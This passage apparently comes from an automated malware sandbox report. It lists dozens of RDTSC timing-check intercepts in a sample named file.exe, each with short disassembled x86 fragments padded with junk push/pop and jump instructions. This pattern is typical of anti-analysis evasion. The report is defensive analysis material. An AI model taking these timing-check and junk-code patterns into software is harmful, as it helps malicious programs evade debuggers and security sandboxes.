00007F3D90F37F18h 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pop edi 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D071B second address: 4D073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F3D90D93B4Ah 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4393 second address: 4D43A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F3D90F37F16h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D360D second address: 4D362A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b js 00007F3D90D93B46h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F3D90D93B46h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D43A0 second address: 4D43E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, dx 0x0000000b push 00000000h 0x0000000d jno 00007F3D90F37F16h 0x00000013 push 00000000h 0x00000015 mov ebx, 3FD00209h 0x0000001a xchg eax, esi 0x0000001b jmp 00007F3D90F37F1Bh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F3D90F37F1Fh 0x00000029 jg 00007F3D90F37F16h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D362A second address: 4D362E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D370A second address: 4D370F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4585 second address: 4D459E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F3D90D93B46h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007F3D90D93B46h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5492 second address: 4D5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D467E second address: 4D46AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D90D93B50h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D644A second address: 4D6450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E00CD second address: 4E00D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E01F3 second address: 4E01F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E01F7 second address: 4E0203 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D90D93B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0203 second address: 4E021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F3D90F37F16h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E021A second address: 4E021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0385 second address: 4E0398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0398 second address: 4E039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E04C3 second address: 4E04C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E04C9 second address: 4E04CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E04CF second address: 4E04D9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D90F37F2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E04D9 second address: 4E0508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B53h 0x00000009 jp 00007F3D90D93B4Ch 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jg 00007F3D90D93B5Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5D84 second address: 4E5D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5D9E second address: 4E5DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA719 second address: 4EA71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EAE15 second address: 4EAE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EAE1B second address: 4EAE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90F37F1Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB26D second address: 4EB284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB284 second address: 4EB28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB28F second address: 4EB293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB7A8 second address: 4EB7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3D90F37F16h 0x0000000a jng 00007F3D90F37F16h 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB7BD second address: 4EB7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3D90D93B58h 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB7E1 second address: 4EB7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A4C second address: 470A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B57h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1725 second address: 4F1729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1729 second address: 4F172F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BBE2B second address: 4BBE31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BBFA9 second address: 4BBFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BBFAF second address: 4BBFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BBFB3 second address: 4BBFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0E5 second address: 4BC0EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BCA31 second address: 4BCA3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BCA3B second address: 4BCA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3D90F37F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BCA45 second address: 4BCA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A192A second address: 4A192E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A192E second address: 4A193A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3D90D93B46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0AFC second address: 4F0B18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F3D90F37F1Bh 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0B18 second address: 4F0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3D90D93B46h 0x0000000a jmp 00007F3D90D93B54h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0CB6 second address: 4F0CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0CBB second address: 4F0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F3D90D93B51h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0CE0 second address: 4F0CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0CE6 second address: 4F0CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5D6E second address: 4F5D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F629C second address: 4F62C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F3D90D93B58h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62C1 second address: 4F62C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6425 second address: 4F644D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3D90D93B54h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jne 00007F3D90D93B46h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F644D second address: 4F646A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3D90F37F28h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F646A second address: 4F6487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B53h 0x00000007 ja 00007F3D90D93B4Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5AA9 second address: 4F5AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3D90F37F16h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5AB4 second address: 4F5AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6715 second address: 4F672F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F26h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F672F second address: 4F6737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6894 second address: 4F6898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6C60 second address: 4F6C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F3D90D93B46h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6C70 second address: 4F6C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F3D90F37F30h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501807 second address: 501813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501813 second address: 501817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501817 second address: 50181B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50181B second address: 501830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3D90F37F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007F3D90F37F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500620 second address: 50062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3D90D93B46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50062A second address: 500645 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3D90F37F22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500645 second address: 50064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5008D4 second address: 5008DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5008DC second address: 5008E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5008E3 second address: 500901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F3D90F37F16h 0x00000009 jmp 00007F3D90F37F23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500B55 second address: 500B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500B5B second address: 500B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500B63 second address: 500BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F3D90D93B5Ah 0x0000000d js 00007F3D90D93B4Ch 0x00000013 js 00007F3D90D93B46h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3D90D93B50h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500CBB second address: 500CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3D90F37F22h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jns 00007F3D90F37F16h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500CE2 second address: 500CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500E30 second address: 500E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500E34 second address: 500E3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500E3E second address: 500E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500E44 second address: 500E4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501156 second address: 501161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3D90F37F16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501161 second address: 501170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90D93B4Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5012BE second address: 5012C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5012C3 second address: 5012CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3D90D93B46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5012CF second address: 5012D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E1F second address: 509E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E31 second address: 509E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E37 second address: 509E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E3B second address: 509E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E3F second address: 509E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E47 second address: 509E54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3D90F37F16h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509725 second address: 50972A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50986B second address: 50986F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50986F second address: 509875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509875 second address: 509899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3D90F37F27h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509899 second address: 5098A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3D90D93B46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5099E5 second address: 5099EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5099EB second address: 5099EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
